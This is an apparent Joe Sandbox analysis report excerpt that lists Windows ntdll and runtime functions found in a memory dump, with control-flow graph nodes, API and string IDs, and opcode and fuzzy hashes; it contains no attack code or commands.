                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 3446177414-3154609507
                                                                              • Opcode ID: b855c14e63c875b8d365a53458b51b3548e271bb0e3b9bc9a90d54a8962835df
                                                                              • Instruction ID: cbc47e5d308ddcfaf946e2ede220bc046fc72f040d9764bc8571f993608451b8
                                                                              • Opcode Fuzzy Hash: b855c14e63c875b8d365a53458b51b3548e271bb0e3b9bc9a90d54a8962835df
                                                                              • Instruction Fuzzy Hash: 9541B272A04665DFCB21CE6DE842A2ABBE4FF89A50F06056DED59DF312D730D801CB91
                                                                              Function 0151DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1474 151dba0-151dbb6 1475 155f73f-155f749 1474->1475 1476 151dbbc-151dbc3 1474->1476 1478 155f74e-155f75f RtlDebugPrintTimes 1475->1478 1477 151dbc9-151dbd0 1476->1477 1476->1478 1480 155f764-155f76e GetPEB 1477->1480 1481 151dbd6-151dbda 1477->1481 1478->1480 1483 155f770-155f78b GetPEB call 14eb970 1480->1483 1484 155f78d-155f792 call 14eb970 1480->1484 1485 151dbdc-151dbe7 call 14fffb0 1481->1485 1486 151dbee-151dbf9 GetPEB 1481->1486 1494 155f797-155f7c9 call 14eb970 * 3 GetPEB 1483->1494 1484->1494 1485->1486 1488 155f7e1-155f7e4 1486->1488 1489 151dbff 1486->1489 1488->1489 1496 155f7ea-155f7f8 GetPEB 1488->1496 1495 151dc04-151dc07 1489->1495 1507 155f7cb-155f7d3 1494->1507 1508 155f7da 1494->1508 1498 155f7fd-155f80a GetPEB 1495->1498 1499 151dc0d-151dc11 1495->1499 1496->1495 1498->1499 1500 155f810-155f817 1498->1500 1500->1499 1507->1508 1508->1488
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                              • API String ID: 3446177414-3526935505
                                                                              • Opcode ID: 76b4823c6aefa2a84492ba5ebf55581009f859c48826e6953389357abe1f41be
                                                                              • Instruction ID: 5b190a84248aff1de5e2c31a422369a6213a195cf3ea1b108a3370dfcb958e6c
                                                                              • Opcode Fuzzy Hash: 76b4823c6aefa2a84492ba5ebf55581009f859c48826e6953389357abe1f41be
                                                                              • Instruction Fuzzy Hash: C3310035254785DFE7669B28C41DB6A7BE4FF11A14F04484FE8028F6A6C7B8A880CB51
                                                                              Function 014EC070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1509 14ec070-14ec09c call 1547e54 1512 154d618-154d623 RtlDebugPrintTimes 1509->1512 1513 14ec0a2-14ec0a8 1509->1513 1517 154d62b-154d63a 1512->1517 1514 14ec0ae-14ec0bd RtlDebugPrintTimes 1513->1514 1515 154d63d-154d666 call 150dd20 RtlDebugPrintTimes call 154d66b 1513->1515 1514->1517 1515->1517
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $
                                                                              • API String ID: 3446177414-3993045852
                                                                              • Opcode ID: bf814091d11a64ce047003078a2189de499505a02eb6f2747a57920ebdfc88a7
                                                                              • Instruction ID: 2d36dfcd0e31dd058042458b1b170a1ce3e3946ab9bb4139eaa076affc7aca29
                                                                              • Opcode Fuzzy Hash: bf814091d11a64ce047003078a2189de499505a02eb6f2747a57920ebdfc88a7
                                                                              • Instruction Fuzzy Hash: C9115E72904219EFCF19AFA4E84869C7BB1FF54764F108519F8266F2D0CB719A04DB80
                                                                              Function 0151EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db4f4b2f2e8da139a9e103342693d9a6547a8b12953bea2cc5702e6d00842504
                                                                              • Instruction ID: 18b886f443a67ff6ebb4aac78001dd26e8358b19290e4d131e2ac2452a95fac0
                                                                              • Opcode Fuzzy Hash: db4f4b2f2e8da139a9e103342693d9a6547a8b12953bea2cc5702e6d00842504
                                                                              • Instruction Fuzzy Hash: 12E12470D00608DFEB26CFA9C984A9DFBF1FF48314F24492AE956AB265D770A845CF50
                                                                              Function 0156EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: 6ced58da41446682d4258a63e16c573ce256c677891f2085b2db6fb75054c767
                                                                              • Instruction ID: ec0f128e6a6bfae38ac9cd6db76a85a0e23aebf4dad79b480085230e4cfe942a
                                                                              • Opcode Fuzzy Hash: 6ced58da41446682d4258a63e16c573ce256c677891f2085b2db6fb75054c767
                                                                              • Instruction Fuzzy Hash: C2713271E00219EFDF05CFA8D894A9DBBF9BF48354F08402AEA15EF254D734A905CBA0
                                                                              Function 0156F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: 9ba04b43b9bbcdfa52992913751223c80ff5f53f70732f875c4b4bf9d467bc60
                                                                              • Instruction ID: 535f7c6ade70816c42920b1d66f2943bf471c89d2238961f48d15f3518ccf926
                                                                              • Opcode Fuzzy Hash: 9ba04b43b9bbcdfa52992913751223c80ff5f53f70732f875c4b4bf9d467bc60
                                                                              • Instruction Fuzzy Hash: 965124B2E00219DFDF08CF98E855ADDBBF9BF48314F18812AE915AB250D7349945CFA4
                                                                              Function 01527B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                              • String ID:
                                                                              • API String ID: 4281723722-0
                                                                              • Opcode ID: 2a43dc0c0885ab24abb1d13a5ff725f10ca978cee8916de92a038c633ad7c8e3
                                                                              • Instruction ID: 766ae467715138aaccc38c0f3ee37bb58ca8ea86150a6a6e13d305f7c2f11db5
                                                                              • Opcode Fuzzy Hash: 2a43dc0c0885ab24abb1d13a5ff725f10ca978cee8916de92a038c633ad7c8e3
                                                                              • Instruction Fuzzy Hash: DD313875E0022AAFCF29DFA8D844A9DBBF1FB48710F11412AE521BF290D7319900DF94
                                                                              Function 014F59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: 0eeb73aea9cb761cb715306db409629778e4b642b574829707802107444bf61c
                                                                              • Instruction ID: b76ad9d71944f59f2c85fb4caea946b311c241e5fb938dc815f5dd30f912783b
                                                                              • Opcode Fuzzy Hash: 0eeb73aea9cb761cb715306db409629778e4b642b574829707802107444bf61c
                                                                              • Instruction Fuzzy Hash: DD324970D0026A9FDB25CF68C954BEEBBB0BB18314F0081EED649AB391D7745A85CF91
                                                                              Function 01537D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                              • Instruction ID: 4d9628ccd1bf3f328409f9746c72f199db57eec9af04827c40cdf78f3cc01709
                                                                              • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                              • Instruction Fuzzy Hash: E29185B1E002169FDB24DF6DC8816BEBBA5BFC8720F14461AE965EF2C0D73099409761
                                                                              Function 0150D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Bl$l
                                                                              • API String ID: 3446177414-208461968
                                                                              • Opcode ID: 5109a24c5eb8bf2b103628a909f351a35047514aa8c57e19316fbb1b4863023c
                                                                              • Instruction ID: 9b5b9c43465021dc2c704ff8d800d793e25d46e402fe75d48aa5e69798d1370d
                                                                              • Opcode Fuzzy Hash: 5109a24c5eb8bf2b103628a909f351a35047514aa8c57e19316fbb1b4863023c
                                                                              • Instruction Fuzzy Hash: 33A18431A0032A8BEF36DBD9C890BADB7B5BB45304F0540E9D9096F281DB75AE85CF51
                                                                              Function 01535DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 01535E34
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__start
                                                                              • String ID: pow
                                                                              • API String ID: 3213639722-2276729525
                                                                              • Opcode ID: ee59c067855f3bf02428f3f0807be7686cc1ccb6d60acd60aed039bb9fb73b55
                                                                              • Instruction ID: b45644b5c35bd4d233c0146159ea23d9c608c13de4cd7fc122cf5dcf88761441
                                                                              • Opcode Fuzzy Hash: ee59c067855f3bf02428f3f0807be7686cc1ccb6d60acd60aed039bb9fb73b55
                                                                              • Instruction Fuzzy Hash: CE518970E282079ADB26B61CC90237E7FD0FBC0700F10DD98E0E58F299FA3585959B46
                                                                              Function 01524C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0$Flst
                                                                              • API String ID: 0-758220159
                                                                              • Opcode ID: 5256b13400ff2d651596df6802c3255bef8e6e9ba42b1888075d1da44347bbdb
                                                                              • Instruction ID: 358ca74cd52de5b550eafefd30daabc0ab76e30aede6cd47680fcbc8b5ae9fc5
                                                                              • Opcode Fuzzy Hash: 5256b13400ff2d651596df6802c3255bef8e6e9ba42b1888075d1da44347bbdb
                                                                              • Instruction Fuzzy Hash: C55179B2E006698FDF26CF99C48466DFBF8FF45718F55802AD0499F291EB709985CB80
                                                                              Function 0151D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlDebugPrintTimes.NTDLL ref: 0151D959
                                                                                • Part of subcall function 014F4859: RtlDebugPrintTimes.NTDLL ref: 014F48F7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $$$
                                                                              • API String ID: 3446177414-233714265
                                                                              • Opcode ID: 6c993c991474a7dfd16c6a5bd01cd979d9787a224ee27ec9f15feb2c72f8d5ec
                                                                              • Instruction ID: 71af647963ac5fdc20056e518949ae723fa7e81e2cb4386752ac58a20e08fab5
                                                                              • Opcode Fuzzy Hash: 6c993c991474a7dfd16c6a5bd01cd979d9787a224ee27ec9f15feb2c72f8d5ec
                                                                              • Instruction Fuzzy Hash: 5D51EE71E00246AFEB2ADFE8C4887ADBBF2BB44318F15415AC9156F289D7749985CB80
                                                                              Function 0156FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $
                                                                              • API String ID: 3446177414-3993045852
                                                                              • Opcode ID: 77e42fff6ce0d2f3c3d0d795dd8ee234b10e95e57193e224c8b07c9d91dd48d7
                                                                              • Instruction ID: 328e07cdddd0a78f40bb0b3fc5e8dacf79db2fda3a04b46e87cc58f9f1d39ccb
                                                                              • Opcode Fuzzy Hash: 77e42fff6ce0d2f3c3d0d795dd8ee234b10e95e57193e224c8b07c9d91dd48d7
                                                                              • Instruction Fuzzy Hash: 57416BB5E01209AFDF55DF99E890AEEBFB9BF48704F14001AE910AB341C7719D11DB90
                                                                              Function 014EDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: 0$0
                                                                              • API String ID: 3446177414-203156872
                                                                              • Opcode ID: 1222121854a8003e125387a3f6549b64a3fbe5ef43a0bd4039c4029a1005275c
                                                                              • Instruction ID: 47df4feb5c8a6e3b4e014124052aff0cefe16ecb82b3002fb96678b1ca25f976
                                                                              • Opcode Fuzzy Hash: 1222121854a8003e125387a3f6549b64a3fbe5ef43a0bd4039c4029a1005275c
                                                                              • Instruction Fuzzy Hash: 5D416DB1A087069FD311CF68C598A1BBBE4BF88314F04492EF988DB351D771E905CB96